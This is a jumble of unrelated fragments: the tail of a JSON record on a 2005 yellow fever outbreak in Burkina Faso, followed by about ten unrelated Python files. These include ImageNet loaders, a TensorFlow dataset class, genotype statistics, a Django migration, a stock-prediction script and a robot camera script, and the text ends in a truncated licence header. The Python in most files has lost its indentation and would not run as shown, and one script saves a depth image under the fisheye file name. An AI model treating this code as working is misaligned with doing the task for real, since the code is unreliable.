"main_text": "WHO has received reports of an outbreak of yellow fever in Batie, Gaoua and Banfora districts in Burkina Faso in the southeast of the country, near the border with Côte d'Ivoire. Four cases including 1 death have been laboratory confirmed by Centre Muraz, Burkina Faso and by the WHO Collaborating Centre for Yellow Fever, the Institut Pasteur, Dakar, Senegal. The fatal case, a boy of 4 years old, came from Bouna region in Côte d'Ivoire. A team from the Ministry of Health and WHO in Burkina Faso and a team from the Ministry of Health, WHO and UNICEF in Côte d'Ivoire quickly investigated the outbreak in this cross border area characterized by increased population movements. A mass vaccination campaign is being prepared in both countries to protect the population at risk and to prevent the spread of the disease to densely populated urban settings. The WHO Regional Office for Africa is working with both Ministries to determine the most appropriate strategies for disease control in the cross border area and to raise funds for outbreak response activities.",
"reports": [{
"event_date": "2005-08-31 xx:xx:xx",
"diseases": ["yellow fever"],
"syndromes": [],
"locations": [{
"city": "Batie",
"state": "Noumbiel Province",
"country": "Burkina Faso",
"continent": "Africa"
}, {
"city": "Gaoua",
"state": "Poni Province",
"country": "Burkina Faso",
"continent": "Africa"
}, {
"city": "Banfora",
"state": "Comoe Province",
"country": "Burkina Faso",
"continent": "Africa"
}, {
"city": "Bouna",
"state": "Zanzan District",
"country": "Côte d'Ivoire",
"continent": "Africa"
}]
}]
}]
|
# BS mark.1-55
# /* coding: utf-8 */
# BlackSmith plugin
# © WitcherGeralt (WitcherGeralt@jabber.ru)
def command_calendar(mType, source, body):
import calendar
date = time.gmtime()
y, z = 0, 0
if body:
body = body.split()
x = body.pop(0)
        if check_number(x):
z = int(x)
if body and check_number(body[0]):
y = int(body.pop(0))
if z not in xrange(1, 13):
y = (date.tm_year)
z = (date.tm_mon)
elif y <= 0:
y = (date.tm_year)
Ans_1 = "\nCalendar:\n*\n*\tM/Y: %s\n*\n*\t%s\n*\nCurrent Date/Time: %s"
clndr = ((calendar.month(y, z)).strip()).splitlines()
Ans_2 = clndr.pop(0)
Ans_3 = "\n*\t".join(clndr)
reply(mType, source, Ans_1 % (Ans_2, Ans_3, time.asctime(date)))
del calendar
command_handler(command_calendar, 10, "calend")
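# Note (added for clarity): calendar.month(year, month) returns a multi-line
# string whose first line is the "Month Year" header and whose remaining lines
# are the week rows; the splitlines()/pop(0) logic above relies on that layout.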
|
from __future__ import print_function
import os
import os.path
from PIL import Image
import torch.utils.data as data
import torchvision.transforms as transforms
from torch.utils.data.dataloader import DataLoader
from data.utils import TransformTwice, RandomTranslateWithReflect
def find_classes_from_folder(dir):
classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]
classes.sort()
class_to_idx = {classes[i]: i for i in range(len(classes))}
return classes, class_to_idx
def find_classes_from_file(file_path):
with open(file_path) as f:
classes = f.readlines()
classes = [x.strip() for x in classes]
classes.sort()
class_to_idx = {classes[i]: i for i in range(len(classes))}
return classes, class_to_idx
def make_dataset(dir, classes, class_to_idx):
samples = []
for target in classes:
d = os.path.join(dir, target)
if not os.path.isdir(d):
continue
for root, _, fnames in sorted(os.walk(d)):
for fname in sorted(fnames):
path = os.path.join(root, fname)
item = (path, class_to_idx[target])
if 'JPEG' in path or 'jpg' in path:
samples.append(item)
return samples
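# Illustrative shape of the returned list (paths are hypothetical):
#   [('<dir>/n01440764/img_0.JPEG', 0), ('<dir>/n01440764/img_1.JPEG', 0), ...]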
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
]
def pil_loader(path):
return Image.open(path).convert('RGB')
class ImageFolder(data.Dataset):
def __init__(self, transform=None, target_transform=None, samples=None, loader=pil_loader):
if len(samples) == 0:
raise (RuntimeError("Found 0 images in subfolders \n"
"Supported image extensions are: " + ",".join(IMG_EXTENSIONS)))
self.samples = samples
self.transform = transform
self.target_transform = target_transform
self.loader = loader
def __getitem__(self, index):
path = self.samples[index][0]
target = self.samples[index][1]
img = self.loader(path)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target, index
def __len__(self):
return len(self.samples)
def ImageNetLoader882(batch_size, num_workers, split='train', shuffle=False,
imagenet_path='data_shallow14/datasets/ImageNet/', split_path='data/splits/imagenet_rand118/'):
classes_118, class_to_idx_118 = find_classes_from_file(split_path + 'imagenet_118.txt')
samples_118 = make_dataset(imagenet_path + split, classes_118, class_to_idx_118)
classes_1000, _ = find_classes_from_folder(imagenet_path + split)
classes_882 = list(set(classes_1000) - set(classes_118))
class_to_idx_882 = {classes_882[i]: i for i in range(len(classes_882))}
samples_882 = make_dataset(imagenet_path + split, classes_882, class_to_idx_882)
if split == 'train':
transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
else:
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset = ImageFolder(transform=transform, samples=samples_882)
dataloader_882 = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers,
pin_memory=True)
return dataloader_882
def ImageNetLoader30(batch_size, num_workers=2, shuffle=False, imagenet_path='data_shallow14/datasets/ImageNet/',
split_path='data/splits/imagenet_rand118/', aug=None, subset='A', subfolder='train'):
# dataloader of 30 classes
classes_30, class_to_idx_30 = find_classes_from_file(split_path + 'imagenet_30_{}.txt'.format(subset))
samples_30 = make_dataset(imagenet_path + subfolder, classes_30, class_to_idx_30)
    if aug is None:
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
elif aug == 'once':
transform = transforms.Compose([
transforms.RandomResizedCrop(224, scale=(0.5, 1.0)),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
elif aug == 'twice':
transform = TransformTwice(transforms.Compose([
transforms.Resize(256),
transforms.RandomCrop(224),
RandomTranslateWithReflect(4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.507, 0.487, 0.441), (0.267, 0.256, 0.276)),
]))
dataset = ImageFolder(transform=transform, samples=samples_30)
dataloader_30 = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers,
pin_memory=True)
return dataloader_30
def ImageNetLoader800from882(batch_size, num_workers, split='train', imagenet_path='data_shallow14/datasets/ImageNet/',
split_path='data/splits/imagenet_rand118/'):
    # this dataloader splits the 882 classes into train (800) + val (82) = 882
classes_118, class_to_idx_118 = find_classes_from_file(split_path + 'imagenet_118.txt')
samples_118 = make_dataset(imagenet_path + 'train', classes_118, class_to_idx_118)
classes_1000, _ = find_classes_from_folder(imagenet_path + 'train')
classes_882 = list(set(classes_1000) - set(classes_118))
classes_train = classes_882[:800]
class_to_idx_train = {classes_train[i]: i for i in range(len(classes_train))}
samples_800 = make_dataset(imagenet_path + split, classes_train, class_to_idx_train)
if split == 'train':
transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
else:
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset_800 = ImageFolder(transform=transform, samples=samples_800)
dataloader_800 = DataLoader(dataset_800, batch_size=batch_size, shuffle=split == 'train', num_workers=num_workers,
pin_memory=True)
return dataloader_800
def ImageNetLoader82from882(batch_size, num_workers, num_val_cls=30, imagenet_path='data_shallow14/datasets/ImageNet/',
split_path='data/splits/imagenet_rand118/'):
classes_118, class_to_idx_118 = find_classes_from_file(split_path + 'imagenet_118.txt')
samples_118 = make_dataset(imagenet_path + 'train', classes_118, class_to_idx_118)
classes_1000, _ = find_classes_from_folder(imagenet_path + 'train')
classes_882 = list(set(classes_1000) - set(classes_118))
classes_val = classes_882[800:800 + num_val_cls]
class_to_idx_val = {classes_val[i]: i for i in range(len(classes_val))}
samples_val = make_dataset(imagenet_path + 'train', classes_val, class_to_idx_val)
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset_val = ImageFolder(transform=transform, samples=samples_val)
dataloader_val = DataLoader(dataset_val, batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=True)
return dataloader_val
def Entity30LoaderLabeled(batch_size, num_workers, split='train', imagenet_path='data_shallow14/datasets/ImageNet/',
split_path='data/splits/imagenet_domain_gap/', imagenet_split='l1'):
split_num = imagenet_split[1]
classes_90, class_to_idx_90 = find_classes_from_file(split_path + 'imagenet_labeled_{}.txt'.format(split_num))
samples_90 = make_dataset(imagenet_path + split, classes_90, class_to_idx_90)
if split == 'train':
transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
else:
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset = ImageFolder(transform=transform, samples=samples_90)
dataloader_90 = DataLoader(dataset, batch_size=batch_size, shuffle=split == 'train', num_workers=num_workers,
pin_memory=True)
return dataloader_90
def Entity30LoaderUnlabeled(batch_size, num_workers=2, shuffle=False, imagenet_path='data_shallow14/datasets/ImageNet/',
split_path='data/splits/imagenet_domain_gap/', imagenet_split='u1',
aug=None, subfolder='train'):
split_num = imagenet_split[1]
classes_30, class_to_idx_30 = find_classes_from_file(split_path + 'imagenet_unlabeled_{}.txt'.format(split_num))
samples_30 = make_dataset(imagenet_path + subfolder, classes_30, class_to_idx_30)
    if aug is None:
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
elif aug == 'once':
transform = transforms.Compose([
transforms.RandomResizedCrop(224, scale=(0.5, 1.0)),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
elif aug == 'twice':
transform = TransformTwice(transforms.Compose([
transforms.Resize(256),
transforms.RandomCrop(224),
RandomTranslateWithReflect(4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.507, 0.487, 0.441), (0.267, 0.256, 0.276)),
]))
dataset = ImageFolder(transform=transform, samples=samples_30)
dataloader_30 = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers,
pin_memory=True)
return dataloader_30
if __name__ == '__main__':
path = 'data_shallow14/datasets/ImageNet/'
classes_118, class_to_idx_118 = find_classes_from_file(path + 'imagenet_rand118/imagenet_118.txt')
samples_118 = make_dataset(path + 'train', classes_118, class_to_idx_118)
classes_1000, _ = find_classes_from_folder(path + 'train')
classes_882 = list(set(classes_1000) - set(classes_118))
class_to_idx_882 = {classes_882[i]: i for i in range(len(classes_882))}
samples_882 = make_dataset(path + 'train', classes_882, class_to_idx_882)
transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset = ImageFolder(transform=transform, samples=samples_882)
dataloader = DataLoader(dataset, batch_size=1, shuffle=True, num_workers=2)
print('data', len(dataloader))
dataloader = ImageNetLoader882(batch_size=400, num_workers=2, imagenet_path='data_shallow14/datasets/ImageNet/')
print('data882', len(dataloader))
    img, target, idx = next(iter(dataloader))
print(target)
dataloader = ImageNetLoader30(batch_size=400, num_workers=2, imagenet_path='data_shallow14/datasets/ImageNet/', subset='A')
print('data30', len(dataloader))
    img, target, idx = next(iter(dataloader))
print(target)
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''Dataset that resizes batches of DataFrame values.
This class is compatible with TensorFlow 1.15.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.util import nest
from hybridbackend.tensorflow.data.dataframe import input_fields
from hybridbackend.tensorflow.pywrap import _ops
class RebatchDatasetV2(dataset_ops.DatasetV2):
r'''A dataset that adjusts batches.
'''
def __init__(
self, input_dataset,
batch_size,
min_batch_size=None,
fields=None,
drop_remainder=False,
num_parallel_scans=1):
r'''Create a `RebatchDatasetV2`.
Args:
      input_dataset: A dataset that outputs batches.
      batch_size: Maximum number of samples in an output batch.
      min_batch_size: (Optional.) Minimum number of samples in a non-final
        batch. Same as `batch_size` by default.
fields: (Optional.) List of DataFrame fields. Fetched from `input_dataset`
by default.
drop_remainder: (Optional.) If True, smaller final batch is dropped.
`False` by default.
num_parallel_scans: (Optional.) Number of concurrent scans against fields
of input dataset.
'''
self._input_dataset = input_dataset
self._batch_size = ops.convert_to_tensor(
batch_size,
dtype=dtypes.int64,
name='batch_size')
if min_batch_size is None:
min_batch_size = batch_size
self._min_batch_size = ops.convert_to_tensor(
min_batch_size,
dtype=dtypes.int64,
name='min_batch_size')
self._fields = input_fields(input_dataset, fields)
self._drop_remainder = drop_remainder
self._num_parallel_scans = num_parallel_scans
self._impl = _ops.rebatch_tabular_dataset(
self._input_dataset._variant_tensor, # pylint: disable=protected-access
self._batch_size,
self._min_batch_size,
field_ids=nest.flatten({
f.name: f.map(lambda _, j=idx: j)
for idx, f in enumerate(self._fields)}),
field_ragged_indices=nest.flatten(
{f.name: f.ragged_indices for f in self._fields}),
drop_remainder=self._drop_remainder,
num_parallel_scans=self._num_parallel_scans)
super().__init__(self._impl)
@property
def fields(self):
return self._fields
@property
def drop_remainder(self):
return self._drop_remainder
@property
def num_parallel_scans(self):
return self._num_parallel_scans
def _inputs(self):
return [self._input_dataset]
@property
def element_spec(self):
return self._input_dataset.element_spec # pylint: disable=protected-access
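# Hedged usage sketch (illustrative, not from this module): assuming `input_ds`
# is a dataset of DataFrame value batches produced elsewhere by hybridbackend,
# rebatching to at most 4096 rows per output batch would look roughly like:
#
#   rebatched = RebatchDatasetV2(input_ds, batch_size=4096, min_batch_size=1024)
#   iterator = tf.compat.v1.data.make_one_shot_iterator(rebatched)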
|
"""
testable.py -
NOTE: this module should not be run as a standalone script, except for
the built-in tests.
"""
# HISTORY ####################################################################
#
# 1 Mar11 MR Initial version
# 2 Dec14 MR Ported to Py3
#
##############################################################################
__description__ = "a _Testable abstract class definition"
__version__ = "2"
__author__ = "Miran R."
from pyrus.core.action import _Action, NoOpAction
class _Testable(object):
"""
_Testable - an abstract class for all testable items
"""
def __init__(self, name, setup, cleanup):
self._name = name
self._setup = setup if setup is not None else NoOpAction()
        self._cleanup = cleanup if cleanup is not None else NoOpAction()
# let's check the setup/cleanup instance
assert isinstance(self._setup, _Action)
assert isinstance(self._cleanup, _Action)
@property
def name(self):
return self._name
@property
def setup(self):
return self._setup
@setup.setter
def setup(self, val):
assert isinstance(val, _Action)
self._setup = val
@property
def cleanup(self):
return self._cleanup
@cleanup.setter
def cleanup(self, val):
assert isinstance(val, _Action)
self._cleanup = val
def toJson(self):
raise NotImplementedError
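# Hedged sketch (not part of the original module): a minimal concrete subclass
# only needs to provide toJson(), e.g.:
#
#   class DummyCase(_Testable):
#       def __init__(self, name):
#           super().__init__(name, NoOpAction(), NoOpAction())
#       def toJson(self):
#           return {"name": self.name}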
|
"""
Copyright 2015 Ronald J. Nowling
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import defaultdict
import random
import numpy as np
import numpy.linalg as la
from scipy.stats import chi2
from scipy.stats import shapiro
from scipy.stats import ttest_1samp
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import SGDRegressor
from sklearn.metrics import log_loss
from sklearn.preprocessing import LabelEncoder
def estimate_lr_iter(n_samples):
return max(20,
int(np.ceil(100000. / n_samples)))
def upsample_features(labels, features):
n_samples, n_features = features.shape
# we make 1 copy for each variable so we can impute each unknown genotype
N_COPIES = features.shape[1]
training_labels = np.zeros(N_COPIES * n_samples)
training_features = np.zeros((N_COPIES * n_samples, n_features))
    for i in range(n_samples):
gt = None
if features[i, :].sum() > 0:
gt = features[i, :].argmax()
        for j in range(N_COPIES):
idx = N_COPIES * i + j
training_labels[idx] = labels[i]
if gt is not None:
training_features[idx, :] = features[i, :]
else:
training_features[idx, j] = 1.
return training_labels, training_features
def lin_reg_log_likelihood(lr, X, y):
pred_y = lr.predict(X)
N, n_params = X.shape
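    # Gaussian log-likelihood: log L = -(N/2) * log(2*pi*sigma^2) - RSS / (2*sigma^2),
    # where sigma^2 is estimated below from the spread of y around its mean and
    # RSS is the residual sum of squares of the predictions.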
# estimate variance (sigma2)
avg_y = np.mean(y)
diff = y - avg_y
diff2 = np.dot(diff, diff)
sigma2 = diff2 / (N - 1)
# residual sum of squares
error = y - pred_y
error2 = np.dot(error, error)
log_likelihood = -N * np.log(2. * np.pi * sigma2) / 2. - error2 / (2.0 * sigma2)
return log_likelihood
def lin_reg_lrtest(X, y, n_iter, g_scaling_factor=1.0):
null_lr = SGDRegressor(fit_intercept = True, max_iter=n_iter)
null_X = np.zeros((X.shape[0], 1))
null_lr.fit(null_X,
y)
alt_lr = SGDRegressor(fit_intercept = False, max_iter=n_iter)
alt_lr.fit(X,
y)
null_likelihood = lin_reg_log_likelihood(null_lr,
null_X,
y)
alt_likelihood = lin_reg_log_likelihood(alt_lr,
X,
y)
G = g_scaling_factor * 2. * (alt_likelihood - null_likelihood)
p_value = chi2.sf(G, X.shape[1] - 1)
p_value = max(1e-300, p_value)
return p_value, alt_lr
def genotype_ttest(X, y):
flattened = X.argmax(axis=1)
# default to 1.0
p_values = np.ones(3)
for i in range(3):
in_group = y[flattened == i]
# need at least 2 samples to do a t-test
if in_group.shape[0] >= 2:
_, p_value = ttest_1samp(in_group, 0.0)
p_values[i] = p_value
return p_values
def genotype_normality_test(X, y):
flattened = X.argmax(axis=1)
# default to 1.0
p_values = np.ones(3)
for i in range(3):
in_group = y[flattened == i]
# need at least 3 samples to do a shapiro test
if in_group.shape[0] >= 3:
_, p_value = shapiro(in_group)
p_values[i] = p_value
return p_values
def snp_linreg_pvalues(X, y):
N_GENOTYPES = 3
n_iter = estimate_lr_iter(len(y))
adj_y, adj_X = upsample_features(y, X)
g_scaling_factor = 1.0 / N_GENOTYPES
snp_p_value, model = lin_reg_lrtest(adj_X,
adj_y,
n_iter,
g_scaling_factor=g_scaling_factor)
gt_pred_ys = model.predict(np.eye(N_GENOTYPES))
gt_ttest_pvalues = genotype_ttest(X, y)
gt_normality_pvalues = genotype_normality_test(X, y)
return snp_p_value, gt_ttest_pvalues, gt_normality_pvalues, gt_pred_ys
def likelihood_ratio_test(features_alternate, labels, lr_model, set_intercept=True, g_scaling_factor=1.0):
if isinstance(features_alternate, tuple) and len(features_alternate) == 2:
training_features, testing_features = features_alternate
training_labels, testing_labels = labels
else:
training_features = features_alternate
testing_features = features_alternate
training_labels = labels
testing_labels = labels
n_training_samples = training_features.shape[0]
n_testing_samples = testing_features.shape[0]
n_iter = estimate_lr_iter(n_testing_samples)
# null model
null_lr = SGDClassifier(loss = "log",
fit_intercept = False,
max_iter = n_iter)
null_training_X = np.ones((n_training_samples, 1))
null_testing_X = np.ones((n_testing_samples, 1))
null_lr.fit(null_training_X,
training_labels)
null_prob = null_lr.predict_proba(null_testing_X)
intercept_init = None
if set_intercept:
intercept_init = null_lr.coef_[:, 0]
lr_model.fit(training_features,
training_labels,
intercept_init = intercept_init)
alt_prob = lr_model.predict_proba(testing_features)
alt_log_likelihood = -log_loss(testing_labels,
alt_prob,
normalize=False)
null_log_likelihood = -log_loss(testing_labels,
null_prob,
normalize=False)
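    # Likelihood-ratio statistic: G = 2 * (LL_alt - LL_null), optionally rescaled,
    # then compared against a chi-squared distribution below.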
G = g_scaling_factor * 2.0 * (alt_log_likelihood - null_log_likelihood)
# both models have intercepts so the intercepts cancel out
df = training_features.shape[1]
p_value = chi2.sf(G, df)
return p_value
def null_predict_proba(intercept):
prob = 1.0 / (1.0 + np.exp(-intercept))
return prob
|
# SISO program longerThan1K.py
# Returns 'yes' if the input is longer than 1000 characters and 'no'
# otherwise.
import utils
from utils import rf
def longerThan1K(inString):
if len(inString) > 1000:
return "yes"
else:
return "no"
def testlongerThan1K():
testVals = [
(1001 * "x", "yes"),
(400 * "xyz", "yes"),
("", "no"),
(1000 * "x", "no"),
]
for (inString, solution) in testVals:
val = longerThan1K(inString)
utils.tprint(inString, ":", val)
assert val == solution
|
# Generated by Django 2.0.13 on 2021-04-28 11:08
import ddcz.models.magic
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("ddcz", "0070_mentat_plural"),
]
operations = [
# This may create user issues, but it's only 7 records
migrations.RunSQL(
sql=[
(
"""
DELETE FROM
`putyka_uzivatele`
WHERE
navstiveno < "2000-01-01 01:01"
"""
)
],
reverse_sql=[],
),
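        # Note: reverse_sql is empty, so reversing this migration does not
        # restore the deleted rows.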
migrations.AlterModelOptions(
name="putykabook",
options={},
),
migrations.AlterModelOptions(
name="putykalinky",
options={},
),
migrations.AlterModelOptions(
name="putykanastenky",
options={},
),
migrations.AlterModelOptions(
name="putykanavstevnost",
options={},
),
migrations.AlterModelOptions(
name="putykaneoblibene",
options={"managed": False},
),
migrations.AlterModelOptions(
name="putykaprispevky",
options={},
),
migrations.AlterModelOptions(
name="putykapristup",
options={},
),
migrations.AlterModelOptions(
name="putykasekce",
options={},
),
migrations.AlterModelOptions(
name="putykaslucovani",
options={},
),
migrations.AlterModelOptions(
name="putykastoly",
options={},
),
migrations.AlterModelOptions(
name="putykauzivatele",
options={},
),
migrations.AlterField(
model_name="putykanastenky",
name="nazev_stolu",
field=ddcz.models.magic.MisencodedCharField(max_length=128),
),
migrations.AlterField(
model_name="putykanastenky",
name="text_nastenky",
field=ddcz.models.magic.MisencodedTextField(),
),
migrations.AlterField(
model_name="putykanastenky",
name="zmenil",
field=ddcz.models.magic.MisencodedCharField(max_length=25),
),
migrations.AlterField(
model_name="putykanavstevnost",
name="misto",
field=ddcz.models.magic.MisencodedCharField(max_length=31),
),
migrations.AlterField(
model_name="putykaprispevky",
name="autor",
field=ddcz.models.magic.MisencodedCharField(max_length=30),
),
migrations.AlterField(
model_name="putykaprispevky",
name="text",
field=ddcz.models.magic.MisencodedTextField(),
),
migrations.AlterField(
model_name="putykapristup",
name="nick_usera",
field=ddcz.models.magic.MisencodedCharField(max_length=30),
),
migrations.AlterField(
model_name="putykapristup",
name="typ_pristupu",
field=ddcz.models.magic.MisencodedCharField(max_length=5),
),
migrations.AlterField(
model_name="putykasekce",
name="nazev",
field=ddcz.models.magic.MisencodedCharField(max_length=50),
),
migrations.AlterField(
model_name="putykasekce",
name="popis",
field=ddcz.models.magic.MisencodedCharField(max_length=255),
),
migrations.AlterField(
model_name="putykaslucovani",
name="oznaceni",
field=ddcz.models.magic.MisencodedCharField(max_length=60),
),
migrations.AlterField(
model_name="putykastoly",
name="jmeno",
field=ddcz.models.magic.MisencodedCharField(max_length=255, unique=True),
),
migrations.AlterField(
model_name="putykastoly",
name="min_level",
field=ddcz.models.magic.MisencodedCharField(max_length=1),
),
migrations.AlterField(
model_name="putykastoly",
name="popis",
field=ddcz.models.magic.MisencodedCharField(max_length=255),
),
migrations.AlterField(
model_name="putykastoly",
name="povol_hodnoceni",
field=ddcz.models.magic.MisencodedCharField(max_length=1),
),
migrations.AlterField(
model_name="putykastoly",
name="verejny",
field=ddcz.models.magic.MisencodedCharField(max_length=1),
),
migrations.AlterField(
model_name="putykastoly",
name="vlastnik",
field=ddcz.models.magic.MisencodedCharField(max_length=30),
),
]
|
import enum
class ContentType(enum.Enum):
answer = 'answer'
pinboard = 'pinboard'
all = 'all'
class UserActions(enum.Enum):
view_answer = 'ANSWER_VIEW'
edit_answer = 'ANSWER_SAVED'
view_pinboard = 'PINBOARD_VIEW'
view_old_embed_pinboard = 'PINBOARD_EMBED_VIEW'
view_embed_pinboard = 'PINBOARD_TSPUBLIC_RUNTIME_FILTER'
view_embed_filtered_pinboard_view = 'PINBOARD_TSPUBLIC_NO_RUNTIME_FILTER'
@classmethod
def strigified(cls, sep: str=' ', context: str=None) -> str:
mapper = {
'answer': [
'ANSWER_VIEW',
'ANSWER_SAVED'
],
'pinboard': [
'PINBOARD_VIEW',
'PINBOARD_EMBED_VIEW',
'PINBOARD_TSPUBLIC_RUNTIME_FILTER',
'PINBOARD_TSPUBLIC_NO_RUNTIME_FILTER'
]
}
allowed = mapper.get(context, [_.value for _ in cls])
return sep.join([_.value for _ in cls if _.value in allowed])
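# Illustrative usage (added for clarity):
#   UserActions.strigified(sep=',', context='answer')
#   # -> 'ANSWER_VIEW,ANSWER_SAVED'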
|
from pymongo import MongoClient
from bitcoin_price_prediction.bayesian_regression import *
import warnings
import pickle
client = MongoClient()
database = client['stock']
# collection = database['x_daily']
collection = database['svxy_intra']
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
np.seterr(divide='ignore', invalid='ignore')
# Retrieve price, v_ask, and v_bid data points from the database.
prices = []
dates =[]
#v_ask = []
#v_bid = []
#num_points = 777600
#for doc in collection.find().limit(num_points):
for doc in collection.find():
prices.append(doc['close'])
dates.append(doc['date'])
#v_ask.append(doc['v_ask'])
#v_bid.append(doc['v_bid'])
prices = prices[::-1]
dates = dates[::-1]
# Divide prices into three, roughly equal sized, periods:
# prices1, prices2, and prices3.
[prices1, prices2, prices3] = np.array_split(prices, 3)
[dates1, dates2, dates3] = np.array_split(dates, 3)
# Divide v_bid into three, roughly equal sized, periods:
# v_bid1, v_bid2, and v_bid3.
#[v_bid1, v_bid2, v_bid3] = np.array_split(v_bid, 3)
# Divide v_ask into three, roughly equal sized, periods:
# v_ask1, v_ask2, and v_ask3.
#[v_ask1, v_ask2, v_ask3] = np.array_split(v_ask, 3)
def make_model():
# Use the first time period (prices1) to generate all possible time series of
    # appropriate lengths (here 5, 25, and 50 points; the variable names keep the original 180/360/720 labels).
timeseries180 = generate_timeseries(prices1, 5)
timeseries360 = generate_timeseries(prices1, 25)
timeseries720 = generate_timeseries(prices1, 50)
# Cluster timeseries180 in 100 clusters using k-means, return the cluster
# centers (centers180), and choose the 20 most effective centers (s1).
centers180 = find_cluster_centers(timeseries180, 100)
s1 = choose_effective_centers(centers180, 20)
centers360 = find_cluster_centers(timeseries360, 100)
s2 = choose_effective_centers(centers360, 20)
centers720 = find_cluster_centers(timeseries720, 100)
s3 = choose_effective_centers(centers720, 20)
# Use the second time period to generate the independent and dependent
# variables in the linear regression model:
# Δp = w0 + w1 * Δp1 + w2 * Δp2 + w3 * Δp3 + w4 * r.
Dpi_r, Dp = linear_regression_vars(prices2, s1, s2, s3)
# Find the parameter values w (w0, w1, w2, w3, w4).
w = find_parameters_w(Dpi_r, Dp)
# Predict average price changes over the third time period.
dps = predict_dps(prices3, s1, s2, s3, w)
return dps
# What's your 'Fuck You Money' number?
dps = make_model()
# file_dps = open('dps.obj', 'w')
# pickle.dump(dps, file_dps)
with open('dps_svxy_intra.pickle', 'wb') as f:
pickle.dump(dps, f)
# file_prices3 = open('prices3.obj', 'w')
# pickle.dump(prices3, file_prices3)
#
# file_dates3 = open('dates3.obj', 'w')
# pickle.dump(dates3, file_dates3)
# for i in range(1):
# bank_balance = evaluate_performance(prices3, dates3, dps, t=0.001, step=1)
# print(bank_balance)
|
import base64
import json
from misty_client.perception.visual import Picture
### Take a standard RGB picture
pic = Picture("10.10.0.7")
filename = "test.png"
resp = pic.take(filename, 600, 400)
img_str = json.loads(resp.content)["result"].get("base64")
img_data = base64.b64decode(img_str)
with open(filename, 'wb') as f:
f.write(img_data)
### Take a fisheye picture
pic = Picture("10.10.0.7")
filename = "test_fisheye.png"
resp = pic.take_fisheye()
img_str = json.loads(resp.content)["result"].get("base64")
img_data = base64.b64decode(img_str)
with open(filename, 'wb') as f:
f.write(img_data)
### Take a depth picture
pic = Picture("10.10.0.7")
filename = "test_fisheye.png"
resp = pic.take_depth()
img_arr = json.loads(resp.content)["result"].get("image")
assert len(img_arr) > 0
|
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
